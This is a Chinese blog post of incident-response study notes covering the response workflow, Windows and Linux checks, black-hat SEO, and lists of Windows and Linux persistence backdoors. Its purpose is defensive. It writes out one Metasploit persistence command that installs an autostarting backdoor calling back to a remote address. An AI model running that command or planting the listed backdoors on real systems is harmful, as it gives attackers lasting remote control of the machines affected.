type
status
date
slug
summary
tags
category
icon
password
URL
1、基本知识 uname -a 查看版本内核 cat …
返回文档虽然我很讨厌应急哈哈,但是开一个新坑,简单记录下应急之道。因为在甲方的应急还是很重要滴!
注意:在面试的时候问道应急响应的时候,一定不要上来就讨论技术,而是要从应急的响应流程开始讲述,一上来的第一步绝对不是查杀,而是沟通(信息收集)与事件判断,第二步就是阻断病毒,切记。
如果一上来就直接说技术,第一容易把自己说死(很容易问得太难),第二的确不符合应急响应的规范。
日志分析一流量分析打补丁补足策略恶意样本分析事件类型判断行为分析 (进程, 启动项等)升级设备保持第一现场一还原攻击过程 – 沙盘推演信息收集完善防御流程应急响应常见流程清除分析阻断加固响应切断网络杀进程删文件阻断传播恢复受害主体 / 群体隔离核心资产一隔离受害主体 / 群体
应急文章https://www.freebuf.com/articles/es/210180.html 勒索病毒https://www.freebuf.com/articles/es/210315.html 应急响应杂谈https://mp.weixin.qq.com/s/3iwA7BEpcxRAVvnZKktSLA Linux 挖矿应急https://bypass007.github.io/Emergency-Response-Notes/ 综合应急响应http://blog.nsfocus.net/emergency-response-case-study/ 三个应急响应案例分析https://www.freebuf.com/articles/system/214353.html wait_for 连接 分享一次应急响应 系统已瘫痪的应急https://www.cnblogs.com/xibuhaohao/p/9928092.html 十字 X 病毒分析应急响应,不断重生的病毒查杀方法
应急响应实战学习
1、应急响应方法论
这一块简单过一下就好了
2、windows 安全检查https://www.yuque.com/feiniao112/rq5bav/odxhcv——主要是用这个 wmic 的脚本来协助 check
3、linux 安全检查https://github.com/T0xst/linux——还是蛮好用的
除了常规的 Linux 检查,如果还有问题的话可能就是库文件被劫持了,这也是黑产常规的手法。库文件劫持修复也简单,直接删掉就好了
sudo patchelf –remove-needed /home/ubuntu/shell.so /bin/ls 删掉 so 文件
4、黑帽 SEO
非传统黑链,属于 SEO 方式,主要是为了增加网站的流量
方式多种多样:总结下来有配置文件劫持,include 包含劫持,前端 js,后端恶意代码,nginx 劫持, dns 解析劫持——又分为本地端和管理端(也就是运营商的 DNS 管理服务器)
5、windows 权限维持方法
windows 权限维持手法简单的来说就是只有 5 种场景
1、计划任务
2、注册表
3、系统服务
4、启动项
5、WMI
6、各种 DLL 劫持(这个攻防用的多点)
7、驱动隐蔽或其他的方式隐藏,这种也是常用语黑帽 SEO 隐藏的手法,webshell 交互会有问题,但是静态资源就可以
工具:easy file locker
九大隐藏文件或者文件夹的方法:https://www.bilibili.com/read/cv841855
6、Linux 权限维持方法
1、端口复用,Linux 和 Windows 不同的是,iptables 就支持端口复用,而 windows 则需要一些工具配合。
2、库文件劫持
3、普通用户 UID=0
4、/etc/sudoers 后门
5、ssh 软链接后门
6、证书登录,空口令登录
7、crontab 计划任务后门
8、rookit
linux 比较多,很多都是攻防用的,黑产其实没那么多。
7、msf 权限维持
run persistence -X -A -i 20 -p 6666 -r 192.168.5.132
持久化原理:
VBS 脚本实现写入动作,每 20S 一次
VBS 内容 计划任务定时执行 VBS 脚本,注册表定时任务,系统自启动项 autoruns
8、windows 和 linux 日志分析
这块没啥好讲的,主要的是有一个 sysmonforlinux ,这个工具还没用过
9、proccess 套装 + pchunter
可以应对绝大多数场景了,例如 kill 不掉的,proccesshacker 都可以干掉
包括杀毒软件,如果一些场景需要密码退出,也可以使用 proccesshacker 干掉
10、记录的多个实战点遇到的问题
1、注意一些常规的点,crontab 之类的,如果有大量数据记得注意,可能病毒将持久化藏在了里面
2、使用 proccesshacker 来 dump 可能存在恶意文件的内存, 十分重要!
若有收获,就点个赞吧 > 本文由简悦 SimpRead 转码
- 作者:NotionNext
- 链接:https://tangly1024.com/article/6c30fa3d-3f11-4f1e-b7b4-f74e90f36864
- 声明:本文采用 CC BY-NC-SA 4.0 许可协议,转载请注明出处。